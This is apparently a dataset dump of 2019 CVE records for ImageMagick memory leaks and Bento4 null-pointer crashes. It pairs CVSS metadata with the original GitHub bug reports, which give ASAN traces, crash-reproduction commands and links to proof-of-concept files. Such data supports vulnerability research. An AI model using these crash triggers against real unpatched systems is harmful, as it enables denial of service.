cve_id
stringlengths
13
16
cve_published
stringlengths
23
23
cve_descriptions
stringlengths
54
1.07k
cve_metrics
dict
cve_references
listlengths
1
34
cve_configurations
listlengths
1
5
url
stringlengths
39
77
cve_tags
sequencelengths
1
4
domain
stringclasses
1 value
issue_owner_repo
sequencelengths
2
2
issue_body
stringlengths
3
88.6k
issue_title
stringlengths
3
335
issue_comments_url
stringlengths
58
81
issue_comments_count
int64
0
146
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
39
62
issue_github_id
int64
128M
2.09B
issue_number
int64
1
122k
CVE-2019-16711
2019-09-23T12:15:10.643
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1542" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-40:*:*:*:*:*:*:*", "matchCriteriaId": "2EA99C30-C4DA-4E3A-85F6-72F0B879EEBE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1542
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description ``` ==85960==ERROR: LeakSanitizer: detected memory leaks Direct leak of 13024 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x43f1f0 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x412eef in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x4153a9 in AcquireImageInfo MagickCore/image.c:349 #4 0x418321 in CloneImageInfo MagickCore/image.c:944 #5 0x64faad in Huffman2DEncodeImage coders/ps2.c:207 #6 0x652046 in WritePS2Image coders/ps2.c:766 #7 0x809316 in WriteImage MagickCore/constitute.c:1159 #8 0x80a03b in WriteImages MagickCore/constitute.c:1376 #9 0xb1573d in CompositeImageCommand MagickWand/composite.c:1676 #10 0xc9d45d in MagickCommandGenesis MagickWand/mogrify.c:184 #11 0x40e9e1 in MagickMain utilities/magick.c:149 #12 0x40ebc2 in main utilities/magick.c:180 #13 0x7ffff31f282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: 13024 byte(s) leaked in 1 allocation(s). ``` ### Steps to Reproduce /usr/local/bin/magick composite Memory-Leak-input1 Memory-Leak-input2 output.ps2 ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: '7.0.8-40' - Environment (Operating system, version and so on): Linux ubuntu 4.15.0-42-generic #45~16.04.1-Ubuntu SMP Mon Nov 19 13:02:27 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux - Additional information: ' ./configure CC="gcc" CXX="g++" CFLAGS="-g -fsanitize=address" -disable-shared' <!-- Thanks for reporting the issue to ImageMagick! --> testcase: [ https://github.com/butterflyhack/pocs/blob/master/memory-leak-1.zip](https://github.com/butterflyhack/pocs/blob/master/memory-leak-1.zip) credit: ADlab of venustech
memory leak in Huffman2DEncodeImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1542/comments
2
2019-04-11T02:03:07Z
2019-10-29T09:33:03Z
https://github.com/ImageMagick/ImageMagick/issues/1542
431,795,900
1,542
CVE-2019-16712
2019-09-23T12:15:10.707
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1557" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:*:*:*:*:*:*:*", "matchCriteriaId": "98A09968-FA06-4217-82A0-802531283B4F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1557
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> ==69057==ERROR: LeakSanitizer: detected memory leaks ``` Direct leak of 13024 byte(s) in 1 object(s) allocated from: #0 0x7f7cb84cd602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x43f2a5 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x412eef in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x4153a4 in AcquireImageInfo MagickCore/image.c:350 #4 0x41831c in CloneImageInfo MagickCore/image.c:945 #5 0x655347 in Huffman2DEncodeImage coders/ps3.c:223 #6 0x65aa9e in WritePS3Image coders/ps3.c:1343 #7 0x809a80 in WriteImage MagickCore/constitute.c:1159 #8 0x80a7a5 in WriteImages MagickCore/constitute.c:1376 #9 0xb1654b in CompositeImageCommand MagickWand/composite.c:1676 #10 0xc9fbca in MagickCommandGenesis MagickWand/mogrify.c:185 #11 0x40e9e1 in MagickMain utilities/magick.c:149 #12 0x40ebc2 in main utilities/magick.c:180 #13 0x7f7cb47bd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: 13024 byte(s) leaked in 1 allocation(s). ``` ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run cmd; ``` /usr/local/bin/magick composite input1 input2 output.ps3 ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: 7.0.8-43 - Environment (Operating system, version and so on): Linux ubuntu 4.15.0-47-generic #50~16.04.1-Ubuntu SMP Fri Mar 15 16:06:21 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux - Additional information: ./configure CC="gcc" CXX="g++" CFLAGS="-g -fsanitize=address" -disable-shared teatcase: https://github.com/butterflyhack/pocs/blob/master/memory-leaks-2.zip credit by ADlab of Venustech <!-- Thanks for reporting the issue to ImageMagick! -->
memory leaks in WritePS3Image
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1557/comments
2
2019-04-28T04:35:49Z
2020-10-30T02:44:04Z
https://github.com/ImageMagick/ImageMagick/issues/1557
438,012,692
1,557
CVE-2019-16713
2019-09-23T12:15:10.783
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1558" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:*:*:*:*:*:*:*", "matchCriteriaId": "98A09968-FA06-4217-82A0-802531283B4F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1558
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> ``` ==104405==ERROR: LeakSanitizer: detected memory leaks Direct leak of 13504 byte(s) in 1 object(s) allocated from: #0 0x7ff36e5f7602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x43f2a5 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x412eef in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x413262 in AcquireImage MagickCore/image.c:172 #4 0x580742 in ReadDOTImage coders/dot.c:129 #5 0x806aa6 in ReadImage MagickCore/constitute.c:547 #6 0x4b69f6 in ReadStream MagickCore/stream.c:1043 #7 0x805b31 in PingImage MagickCore/constitute.c:269 #8 0x8060fd in PingImages MagickCore/constitute.c:370 #9 0xc1b2a7 in IdentifyImageCommand MagickWand/identify.c:319 #10 0xc9fbca in MagickCommandGenesis MagickWand/mogrify.c:185 #11 0x40e9e1 in MagickMain utilities/magick.c:149 #12 0x40ebc2 in main utilities/magick.c:180 #13 0x7ff36a8e782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) ``` ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run cmd: ``` /usr/local/bin/magick identify $inupt ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: 7.0.8-43 - Environment (Operating system, version and so on): Linux ubuntu 4.15.0-47-generic #50~16.04.1-Ubuntu SMP Fri Mar 15 16:06:21 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux - Additional information: ./configure CC="gcc" CXX="g++" CFLAGS="-g -fsanitize=address" -disable-shared testcase: https://github.com/butterflyhack/pocs/blob/master/memory-leaks-identify-PingImage.zip report by ADlab of Venustech <!-- Thanks for reporting the issue to ImageMagick! -->
memory leaks in PingImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1558/comments
2
2019-04-28T04:48:48Z
2019-09-24T07:16:29Z
https://github.com/ImageMagick/ImageMagick/issues/1558
438,013,444
1,558
CVE-2019-17452
2019-10-10T17:15:17.780
Bento4 1.5.1.0 has a NULL pointer dereference in AP4_DescriptorListInspector::Action in Core/Ap4Descriptor.h, related to AP4_IodsAtom::InspectFields in Core/Ap4IodsAtom.cpp, as demonstrated by mp4dump.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/434" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/434
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
**System Details** Commit ID: bc1b02a Test Machine : Ubuntu 16.04.3 LTS MP4 File Dumper - Version 1.2 (Bento4 Version 1.5.1.0) **Command** mp4dump --verbosity 2 POC-file **ASAN Output** ``` ASAN:DEADLYSIGNAL ================================================================= ==12343==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000054cbf4 bp 0x7fff4ca92010 sp 0x7fff4ca91f30 T0) #0 0x54cbf3 in AP4_DescriptorListInspector::Action(AP4_Descriptor*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:124:9 #1 0x69aa85 in AP4_List<AP4_Descriptor>::Apply(AP4_List<AP4_Descriptor>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #2 0x69aa85 in AP4_InitialObjectDescriptor::Inspect(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:327 #3 0x586b12 in AP4_IodsAtom::InspectFields(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4IodsAtom.cpp:112:9 #4 0x53e7a4 in AP4_Atom::Inspect(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:263:5 #5 0x57843c in AP4_AtomListInspector::Action(AP4_Atom*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.h:532:9 #6 0x673506 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #7 0x673506 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #8 0x53e7a4 in AP4_Atom::Inspect(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:263:5 #9 0x5283ae in main /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:350:9 #10 0x7efe540e182f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #11 0x451258 in _start (/home/fuzzer/victim/Bento4/mp4dump+0x451258) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:124:9 in AP4_DescriptorListInspector::Action(AP4_Descriptor*) const ==12343==ABORTING ```
SEGV in mp4dump
https://api.github.com/repos/axiomatic-systems/Bento4/issues/434/comments
4
2019-09-29T17:37:28Z
2022-02-28T03:29:23Z
https://github.com/axiomatic-systems/Bento4/issues/434
499,946,487
434
CVE-2019-17453
2019-10-10T17:15:17.843
Bento4 1.5.1.0 has a NULL pointer dereference in AP4_DescriptorListWriter::Action in Core/Ap4Descriptor.h, related to AP4_IodsAtom::WriteFields in Core/Ap4IodsAtom.cpp, as demonstrated by mp4encrypt or mp4compact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/436" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/437" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/436
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
**System Details** Commit ID: bc1b02a Test Machine : Ubuntu 16.04.3 LTS MP4 Compacter - Version 1.0 (Bento4 Version 1.5.1.0) **Command** mp4compact POC /dev/null **ASAN Output** ``` ASAN:DEADLYSIGNAL ================================================================= ==5286==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000544c94 bp 0x7ffd515e2390 sp 0x7ffd515e22b0 T0) #0 0x544c93 in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:108:16 #1 0x698656 in AP4_List<AP4_Descriptor>::Apply(AP4_List<AP4_Descriptor>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #2 0x698656 in AP4_InitialObjectDescriptor::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:300 #3 0x5974e8 in AP4_Expandable::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Expandable.cpp:105:5 #4 0x585e34 in AP4_IodsAtom::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4IodsAtom.cpp:99:36 #5 0x536b11 in AP4_Atom::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:229:14 #6 0x53c322 in AP4_AtomListWriter::Action(AP4_Atom*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:753:5 #7 0x54dbfe in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #8 0x54dbfe in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Processor.cpp:644 #9 0x5262cf in main /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Compact/Mp4Compact.cpp:220:14 #10 0x7f91a991a82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #11 0x4509e8 in _start (/home/fuzzer/victim/Bento4/mp4compact+0x4509e8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:108:16 in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const ==5286==ABORTING ```
SEGV in mp4compact
https://api.github.com/repos/axiomatic-systems/Bento4/issues/436/comments
0
